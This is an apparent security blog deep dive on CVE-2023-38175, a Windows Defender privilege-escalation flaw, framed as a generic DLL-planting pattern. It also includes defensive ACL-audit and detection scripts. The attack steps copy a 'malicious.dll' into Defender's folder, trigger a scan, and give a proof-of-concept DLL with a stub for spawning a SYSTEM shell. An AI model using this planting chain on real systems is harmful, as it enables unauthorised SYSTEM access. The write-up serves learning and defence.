Published: June 2024

Introduction

On August 8, 2023, Microsoft published its advisory and fix for a critical vulnerability in Windows Defender, tracked as CVE-2023-38175. The flaw lets a standard user gain elevated privileges, up to SYSTEM, which amounts to full compromise of the Windows machine.

In this deep dive, we'll summarize what has been published about CVE-2023-38175, illustrate the file-planting attack pattern it belongs to with simple examples, and walk through a minimal proof-of-concept for educational use.

What Is CVE-2023-38175?

CVE-2023-38175 is an Elevation of Privilege (EoP) vulnerability in Microsoft Defender, the antivirus built into Windows 10 and 11. In plain terms, a user without admin rights can leverage it to run code as an administrator or, worse, as SYSTEM.

Affected systems: Windows 10 and 11, and Windows Server 2012 and later, wherever Microsoft Defender is enabled.

Severity: High  
CVSS Score: 7.8 (High)

Official Microsoft Advisory:  
MSRC CVE-2023-38175

The Flawed Mechanism

Windows Defender runs its core service, the Antimalware Service Executable (MsMpEng.exe), as SYSTEM; it hosts the scan engine and handles signature updates, scans, and quarantine actions. Microsoft's advisory does not publish a root cause for CVE-2023-38175; the public description is that the Defender service mishandles certain request objects or file operations, letting a user replace or tamper with files that Defender later processes as SYSTEM. The steps below therefore walk through the generic file-planting pattern this class of bug relies on, not a confirmed analysis of this specific flaw.

Step 1: Path Traversal and File Permissions

The most reliable attack path involves abusing the permissions of Defender's temp or logging directories. If such a directory is overly permissive (for example, an ACE granting "Authenticated Users: Modify"), a non-admin can create or overwrite files in it. When Defender later loads or processes those files as SYSTEM, the attacker's content runs with the service's privileges, or Defender is steered into executing an attacker-controlled binary.

The default location for Windows Defender's scan history and service logs is

C:\ProgramData\Microsoft\Windows Defender\Scans\History\Service\

Check permissions (in PowerShell):

(Get-Acl "C:\ProgramData\Microsoft\Windows Defender\Scans\History\Service").Access | Format-Table IdentityReference, FileSystemRights, AccessControlType, IsInherited -AutoSize

If "Authenticated Users", "Users" or "Everyone" hold Write, Modify or FullControl here, non-admins can plant files and the rest of this walkthrough applies. Note that this is an ACL check, not a version check: whether the engine itself is vulnerable is determined by its build, not by folder permissions.
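The one-liner above only prints the directory's own ACL. The function below is an added example (not code from the original post) that does the check a practitioner actually wants: it walks from the target directory up to the drive root, flags any Allow ACE that gives a low-privilege principal the rights needed to create, replace or rename away a file (or to rewrite the ACL), and also catches inherited entries that Get-Acl shows as raw generic-rights numbers. The list of low-privilege principals and the default path are assumptions for the demo.

```powershell
function Test-PlantableDirectory {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)] [string] $Path,
        # Principals any local user can claim; extend for your environment (assumed list).
        [string[]] $LowPrivPrincipals = @(
            'Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE'
        )
    )
    # Rights that let the holder drop, overwrite or rename away a file in the directory,
    # or change who may. Modify, Write and FullControl all contain some of these bits.
    $fsr = [System.Security.AccessControl.FileSystemRights]
    $dangerous = $fsr::CreateFiles -bor $fsr::CreateDirectories -bor $fsr::Delete -bor
                 $fsr::DeleteSubdirectoriesAndFiles -bor $fsr::ChangePermissions -bor $fsr::TakeOwnership
    # Inherited ACEs are often stored as generic rights; GENERIC_WRITE / GENERIC_ALL also count.
    $genericWriteOrAll = 0x40000000 -bor 0x10000000

    $findings = @()
    $dir = Get-Item -LiteralPath $Path -ErrorAction Stop
    # A writable ancestor is as bad as a writable target: the attacker can rename the
    # protected subtree aside and recreate it, so walk all the way up to the root.
    while ($dir) {
        try {
            $acl = Get-Acl -LiteralPath $dir.FullName -ErrorAction Stop
        } catch {
            $findings += [pscustomobject]@{ Path = $dir.FullName; Principal = '<ACL unreadable>';
                                            Rights = $_.Exception.Message; Inherited = $null }
            break
        }
        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }   # Deny ACEs are not modelled here
            if ($LowPrivPrincipals -notcontains $ace.IdentityReference.Value) { continue }
            $bits = [int]$ace.FileSystemRights
            if (($bits -band [int]$dangerous) -eq 0 -and ($bits -band $genericWriteOrAll) -eq 0) { continue }
            $findings += [pscustomobject]@{
                Path      = $dir.FullName
                Principal = $ace.IdentityReference.Value
                Rights    = $ace.FileSystemRights
                Inherited = $ace.IsInherited
            }
        }
        $dir = $dir.Parent
    }
    return $findings
}

# Empty output means no low-privilege principal can plant files anywhere along the path.
Test-PlantableDirectory 'C:\ProgramData\Microsoft\Windows Defender\Scans\History\Service' | Format-Table -AutoSize
```

Run it from an elevated prompt: Defender's ProgramData tree is locked down, and if Get-Acl is denied for your account the function reports the directory as unreadable rather than silently treating it as safe.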

Step 2: Planting a Malicious DLL or Executable

Suppose Defender, when updating signatures or scanning, loads files from this directory without enforcing ownership or impersonation checks. An attacker can drop a DLL or .exe payload named to match a legitimate component (the name scanengine.dll below is a placeholder, not a real Defender module):

Copy-Item .\malicious.dll "C:\ProgramData\Microsoft\Windows Defender\Scans\History\Service\scanengine.dll"

Step 3: Triggering Execution

In this pattern, a system event, such as a Defender scan or a forced signature update, causes the service to load files matching some pattern (say, *.dll) from the directory. If the planted file is already present when that happens, Defender loads it and the attacker's code runs as SYSTEM.

Example: Triggering a scan (user-level PowerShell):

Start-MpScan -ScanType QuickScan

If successful, the code in malicious.dll runs inside the SYSTEM process that loaded it (MsMpEng.exe); no separate process is created unless the payload spawns one, for example a SYSTEM shell.

Exploit Proof-of-Concept (Educational Only!)

Below is a simplified PoC DLL written in C for Windows. It assumes your account has write access to the targeted folder and that the service really loads the planted file. Instead of popping a MessageBox, which a SYSTEM service in session 0 cannot display on any visible desktop, it creates a marker file; the file's owner (Get-Acl on the marker) proves which account loaded the DLL.

malicious.c (compile as DLL)

#include <windows.h>

// Runs in whatever process loads the DLL. MsMpEng.exe runs as SYSTEM in session 0,
// where no interactive desktop exists, so a MessageBox would never be seen. Create a
// marker file instead; its owner shows which account loaded us. Path is a placeholder.
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
    if (ul_reason_for_call == DLL_PROCESS_ATTACH) {
        DisableThreadLibraryCalls(hModule);
        HANDLE h = CreateFileW(L"C:\\Windows\\Temp\\cve-2023-38175-marker.txt",
                               GENERIC_WRITE, 0, NULL, CREATE_ALWAYS,
                               FILE_ATTRIBUTE_NORMAL, NULL);
        if (h != INVALID_HANDLE_VALUE) CloseHandle(h);
        // Place SYSTEM shell-spawning code here (start a thread; keep DllMain short).
    }
    return TRUE;
}


Compile from a Visual Studio developer prompt:

cl /LD malicious.c

Then trigger a Defender scan (Start-MpScan -ScanType QuickScan) or wait for the service to reload, and check whether the marker file appeared and who owns it.

Note: This is a learning example. Don't attack systems without permission.

Mitigation and Detection

Microsoft Fix:  
Apply the fix referenced in the MSRC advisory. Defender engine fixes are delivered through Defender's own update channel rather than the monthly cumulative update, so confirm the engine build on each host (Get-MpComputerStatus reports it as AMEngineVersion) against the minimum version the advisory lists; do not assume a host is fixed just because Windows Update is current.

Temporary Mitigation:

Restrict folder permissions for Defender's directories. Disable inheritance with the existing ACEs copied (/inheritance:d), not removed (/inheritance:r), otherwise the directory can be left with no ACEs at all and the Defender service itself loses access. Back the ACL up first (icacls ... /save), and expect Defender's tamper protection to reject or revert changes to its own folders; this is a stopgap until the engine update lands.

icacls "C:\ProgramData\Microsoft\Windows Defender\Scans\History\Service" /inheritance:d /remove "Users" "Authenticated Users"

Detection:
Monitor Defender's service folders for unrecognized DLLs or executables created by, or owned by, accounts other than SYSTEM.

SIEM Rule Example:

Event Source: File System (file-create auditing or Sysmon Event ID 11)
Event ID: File Create
Path: C:\ProgramData\Microsoft\Windows Defender\Scans\History\Service\
Condition: [File Owner] != "SYSTEM" AND [File Extension] IN (".dll", ".exe")
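The rule above expressed as runnable filter logic, as an added example that is not part of the original post: it takes Sysmon FileCreate (Event ID 11) records, keeps only DLL/EXE/SYS creates under Defender's directories, and drops the ones written by the service accounts Defender legitimately runs under. The three records are constructed for the demo; the field names (UtcTime, User, Image, TargetFilename) follow Sysmon's FileCreate schema, which is assumed to be what the SIEM ingests, and the path and account lists are assumptions to adapt.

```powershell
# Directories Defender writes to; extend with any non-default install paths (assumed list).
$DefenderPaths = @(
    'C:\ProgramData\Microsoft\Windows Defender\',
    'C:\Program Files\Windows Defender\'
)
# Accounts the Defender service legitimately writes as; anything else is suspicious here.
$TrustedWriters = @('NT AUTHORITY\SYSTEM', 'NT AUTHORITY\LOCAL SERVICE', 'NT AUTHORITY\NETWORK SERVICE')

function Find-DefenderPlantEvents {
    param([Parameter(Mandatory)] [object[]] $Events)
    foreach ($e in $Events) {
        $inDefenderDir = $false
        foreach ($p in $DefenderPaths) {
            if ($e.TargetFilename.StartsWith($p, [System.StringComparison]::OrdinalIgnoreCase)) { $inDefenderDir = $true }
        }
        if (-not $inDefenderDir) { continue }
        # Executable payload types, not just .dll: a planted .exe is the other case the post mentions.
        if ([IO.Path]::GetExtension($e.TargetFilename) -notin '.dll', '.exe', '.sys') { continue }
        if ($TrustedWriters -contains $e.User) { continue }
        [pscustomobject]@{ Time = $e.UtcTime; User = $e.User; Image = $e.Image; File = $e.TargetFilename }
    }
}

# Constructed sample: a legitimate engine update by SYSTEM, a scan-history blob, and a planted DLL.
$sample = @(
    [pscustomobject]@{ UtcTime = '2023-08-09 10:01:12'; User = 'NT AUTHORITY\SYSTEM'
                       Image = 'C:\Program Files\Windows Defender\MsMpEng.exe'
                       TargetFilename = 'C:\ProgramData\Microsoft\Windows Defender\Definition Updates\Updates\mpengine.dll' }
    [pscustomobject]@{ UtcTime = '2023-08-09 10:02:40'; User = 'NT AUTHORITY\SYSTEM'
                       Image = 'C:\Program Files\Windows Defender\MsMpEng.exe'
                       TargetFilename = 'C:\ProgramData\Microsoft\Windows Defender\Scans\History\Service\DetectionHistory\01\abc.bin' }
    [pscustomobject]@{ UtcTime = '2023-08-09 10:05:03'; User = 'DESKTOP-LAB\lowpriv'
                       Image = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
                       TargetFilename = 'C:\ProgramData\Microsoft\Windows Defender\Scans\History\Service\scanengine.dll' }
)

# Only the third record should be reported.
Find-DefenderPlantEvents $sample | Format-Table -AutoSize
```

On a live host the same function can be fed from Get-WinEvent against the Microsoft-Windows-Sysmon/Operational log (EventID 11), mapping the event's Properties onto the four field names used above. The SYSTEM exclusion is deliberately narrow: an attacker who already runs as SYSTEM has nothing left to escalate, so those creates are not the signal this rule is after.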

More References

- MSRC CVE-2023-38175
- NVD CVE-2023-38175 Entry

Conclusion

CVE-2023-38175 is a reminder of how permission mistakes in critical system folders can turn into privilege escalation on Windows. Even a built-in security tool like Defender becomes a risk when a SYSTEM service processes content that a lower-privileged user can write. Keep the engine updated, and monitor both what your antivirus is allowed to access and who is allowed to write to the folders it trusts.

Timeline (CVE record)

Published on: 08/08/2023 18:15:00 UTC
Last modified on: 08/11/2023 15:53:00 UTC